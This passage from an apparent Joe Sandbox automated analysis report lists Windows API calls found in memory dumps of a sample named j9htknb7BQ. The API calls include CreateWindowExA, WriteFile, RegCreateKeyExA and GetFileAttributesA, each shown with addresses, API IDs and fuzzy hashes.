                                                                            • Part of subcall function 0041EF68: EnableWindow.USER32(?,00000001), ref: 0041EF85
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$A15940CurrentEnablePathPrepareThreadWrite
                                                                          • String ID:
                                                                          • API String ID: 1039859321-0
                                                                          • Opcode ID: a542d2fe0218e89889f5f5091b901710e807ef3ef5334a09fe7f4d59435151a3
                                                                          • Instruction ID: 01ed1b7c575f4ace7d1103a0bc1ae6f252d8ead66db9bed0bf215ba1be387fc5
                                                                          • Opcode Fuzzy Hash: a542d2fe0218e89889f5f5091b901710e807ef3ef5334a09fe7f4d59435151a3
                                                                          • Instruction Fuzzy Hash: 09F059B0244300BFE7109B32FC16B6677E8D709708F90443BF400C25C0E3794880C9AE
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite
                                                                          • String ID:
                                                                          • API String ID: 3934441357-0
                                                                          • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                          • Instruction ID: 028ceee379c3c7d470caefb370f3d10d378470f307764de9520dc446ef7e13f5
                                                                          • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                          • Instruction Fuzzy Hash: 1AF06D3090410AEFEB1CCF58D0A58BFB7A1EB48300B20856FE607C7790D638AE60DB58
                                                                          APIs
                                                                          • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416595
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: 99ee45e58afab452ebd8d8099a4319ca8bb03e99333467587a6c742e65940f0d
                                                                          • Instruction ID: 13f77f5b12b5d4dba0df04b824f9bbdcdbf9abdef4ba7f4078844aaa66f06397
                                                                          • Opcode Fuzzy Hash: 99ee45e58afab452ebd8d8099a4319ca8bb03e99333467587a6c742e65940f0d
                                                                          • Instruction Fuzzy Hash: C3F013B2200510AFDB84CF9CD9C0F9373ECEB0C210B0881A6FA08CF24AD225EC108BB1
                                                                          APIs
                                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149FF
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CallbackDispatcherUser
                                                                          • String ID:
                                                                          • API String ID: 2492992576-0
                                                                          • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                          • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                          • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                          • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,0042CCE0,?,00000001,?,?,00000000,?,0042CD32,00000000,00452085,00000000,004520A6,?,00000000), ref: 0042CCC3
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: 61041821089c7d4aa2000ec0e86c70dfe7be4184ca8188e9cf26529104da5cfb
                                                                          • Instruction ID: 1943a86784c022a2dfd859aef87f3de3c0de5fcd5c78e915f44ffa8231ae9d07
                                                                          • Opcode Fuzzy Hash: 61041821089c7d4aa2000ec0e86c70dfe7be4184ca8188e9cf26529104da5cfb
                                                                          • Instruction Fuzzy Hash: B0E06571304704BFD711EB629C93A5EBBACD745714B914476F500D7541D578AE009558
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 0044FE64
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: b8d30b55bd9c337fb850a3ffead974af8be894f982605e1024d96d7d98714d33
                                                                          • Instruction ID: e92c98a8af308b3432749b2dbea91310ced2c99b4e9e22dcf80a84a4ab028b75
                                                                          • Opcode Fuzzy Hash: b8d30b55bd9c337fb850a3ffead974af8be894f982605e1024d96d7d98714d33
                                                                          • Instruction Fuzzy Hash: C9E092A13501083ED340EEAC7C42FA33BCC931A718F008037F988C7242C8619D148BA9
                                                                          APIs
                                                                          • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,004528D3,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E75B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: FormatMessage
                                                                          • String ID:
                                                                          • API String ID: 1306739567-0
                                                                          • Opcode ID: f2e57c13329fa82bb562111542c19212575287ec657190e48755ffcde1de8f0a
                                                                          • Instruction ID: 307a162b73ad64172b1e6f06154ade3ab8019b251ee6aa90c4987cddc8a641e5
                                                                          • Opcode Fuzzy Hash: f2e57c13329fa82bb562111542c19212575287ec657190e48755ffcde1de8f0a
                                                                          • Instruction Fuzzy Hash: 80E0206178431165F23529156C83F7B120E83C0B08F9480267B50DD3D3DAAE9D09425E
                                                                          APIs
                                                                          • CreateWindowExA.USER32(00000000,0042368C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00406329
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                          • Instruction ID: 1d12608fc0467a25e6c73015cc4d191371d7057fe5102c86e19c90aa3d4ae925
                                                                          • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                          • Instruction Fuzzy Hash: 4CE002B2204309BFDB00DE8ADDC1DABB7ACFB4C654F844105BB1C972428275AD608BB1
                                                                          APIs
                                                                          • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0
                                                                          • Opcode ID: 5e59f431e7dc3fbfe634ec8590c1537f060de66ed7aab2066b747fc67b6210b1
                                                                          • Instruction ID: f0f4a7cc191af20e9b9700f54d410718858f5ac06abb37c2f1ccc41e28cff8f4
                                                                          • Opcode Fuzzy Hash: 5e59f431e7dc3fbfe634ec8590c1537f060de66ed7aab2066b747fc67b6210b1
                                                                          • Instruction Fuzzy Hash: 05E07EB2610129AF9B40DE8CDC81EEB37ADEB1D350F408016FA08D7200C274EC519BB4
                                                                          APIs
                                                                          • FindClose.KERNEL32(00000000,000000FF,0046F950,00000000,0047073F,?,00000000,00470788,?,00000000,004708C1,?,00000000,?,00000000), ref: 0045412A
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseFind
                                                                          • String ID:
                                                                          • API String ID: 1863332320-0
                                                                          • Opcode ID: e19e0392ffb8f942ef07e4f90012c062304df668bc5034957742c687a3574691
                                                                          • Instruction ID: 5eabd71f03f270c9e36328c123aabe4f760eecb17ac4c97f42f59bce307939db
                                                                          • Opcode Fuzzy Hash: e19e0392ffb8f942ef07e4f90012c062304df668bc5034957742c687a3574691
                                                                          • Instruction Fuzzy Hash: CEE065B0A04A004BCB14DF3A898425676D25FD5324F04C56AAC58CF3D6E63C84859A26
                                                                          APIs
                                                                          • KiUserCallbackDispatcher.NTDLL(00493E46,?,00493E68,?,?,00000000,00493E46,?,?), ref: 004146AB
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CallbackDispatcherUser
                                                                          • String ID:
                                                                          • API String ID: 2492992576-0
                                                                          • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                          • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                                          • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                          • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                                          APIs
                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F2C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite
                                                                          • String ID:
                                                                          • API String ID: 3934441357-0
                                                                          • Opcode ID: 6989787615dda6fb0474b9a852aed77f7455facdbde297e08749939c69554e6e
                                                                          • Instruction ID: 1f586823f232578dbf745533d190da316c23ef772c10fc749b20f2ce5ea51255
                                                                          • Opcode Fuzzy Hash: 6989787615dda6fb0474b9a852aed77f7455facdbde297e08749939c69554e6e
                                                                          • Instruction Fuzzy Hash: E0D05B723091117AD620955F6C44DA76BDCCBC5770F11063EB558D72C1D7309C01C675
                                                                          APIs
                                                                            • Part of subcall function 00423608: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042361D
                                                                          • ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                            • Part of subcall function 00423638: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423654
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: InfoParametersSystem$ShowWindow
                                                                          • String ID:
                                                                          • API String ID: 3202724764-0
                                                                          • Opcode ID: 1489a060ee1bcc8cc48c15b27d983b014cc6d9756e6ca662c79b076239964338
                                                                          • Instruction ID: 40ba6511a88705317f68f90b714cf273492cbff5df7e869aa0dea3a735aecdb5
                                                                          • Opcode Fuzzy Hash: 1489a060ee1bcc8cc48c15b27d983b014cc6d9756e6ca662c79b076239964338
                                                                          • Instruction Fuzzy Hash: 89D05E123831B03106307BB72805ACB86AC8D966AB389047BB5409B302E91E8A0A61AC
                                                                          APIs
                                                                          • SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: TextWindow
                                                                          • String ID:
                                                                          • API String ID: 530164218-0
                                                                          • Opcode ID: ec54067a7769377eb2baeee9a4c2879ed8266950ae1d3b96fccc382486b1e86e
                                                                          • Instruction ID: 772c2b490b6417829154bcce5d0a54014a2db275ddfc333997dbbca6f26d49c5
                                                                          • Opcode Fuzzy Hash: ec54067a7769377eb2baeee9a4c2879ed8266950ae1d3b96fccc382486b1e86e
                                                                          • Instruction Fuzzy Hash: 7ED05EE27011702BCB01BAED54C4AC667CC9B8825AB1940BBF904EF257C678CE4083A8
                                                                          APIs
                                                                          • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00466F40,00000000,00000000,00000000,0000000C,00000000), ref: 0046626C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CallbackDispatcherUser
                                                                          • String ID:
                                                                          • API String ID: 2492992576-0
                                                                          • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                          • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                                          • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                          • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,00450C2B,00000000), ref: 0042CCFB
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AttributesFile
                                                                          • String ID:
                                                                          • API String ID: 3188754299-0
                                                                          • Opcode ID: 01dbdc36424fec664e934353753d4045270514496262de1bfab72665a96f96e3
                                                                          • Instruction ID: cee2652a42bb6fa335edebfce0b7cce520d77b1cbd3538a4821e8cc024acaa82
                                                                          • Opcode Fuzzy Hash: 01dbdc36424fec664e934353753d4045270514496262de1bfab72665a96f96e3
                                                                          • Instruction Fuzzy Hash: 66C08CE03222001A9A1065BD3CC911F06C8892833A3A41F37B438E32D2E23E88266028
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A8D4,0040CE80,?,00000000,?), ref: 00406EE5
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFile
                                                                          • String ID:
                                                                          • API String ID: 823142352-0
                                                                          • Opcode ID: 7f8aa10a2b0ebcd99225cbdae7d816ffd0c8159e943a954a1b877cbd8b688861
                                                                          • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                                          • Opcode Fuzzy Hash: 7f8aa10a2b0ebcd99225cbdae7d816ffd0c8159e943a954a1b877cbd8b688861
                                                                          • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                                          APIs
                                                                          • SetCurrentDirectoryA.KERNEL32(00000000,?,0049627E,00000000,00496451,?,?,00000005,00000000,00496485,?,?,00000000), ref: 004072BB
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentDirectory
                                                                          • String ID:
                                                                          • API String ID: 1611563598-0
                                                                          • Opcode ID: b7f7ac57d488892482cd1d27060886e150623f3d0701accf4d1aa85b87094221
                                                                          • Instruction ID: c18bf430a4858a09d5fd0626d157798880aaaa8ea81a5298b6cf69089c3012d4
                                                                          • Opcode Fuzzy Hash: b7f7ac57d488892482cd1d27060886e150623f3d0701accf4d1aa85b87094221
                                                                          • Instruction Fuzzy Hash: B0B012E03D161B27CA0079FE4CC191A01CC46292163501B3A3006E71C3D83CC8080514
                                                                          APIs
                                                                          • SetEndOfFile.KERNEL32(?,?,0045BA62,00000000,0045BBED,?,00000000,00000002,00000002), ref: 0044FF93
                                                                            • Part of subcall function 0044FD14: GetLastError.KERNEL32(0044FB30,0044FDD6,?,00000000,?,004962F0,00000001,00000000,00000002,00000000,00496451,?,?,00000005,00000000,00496485), ref: 0044FD17
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
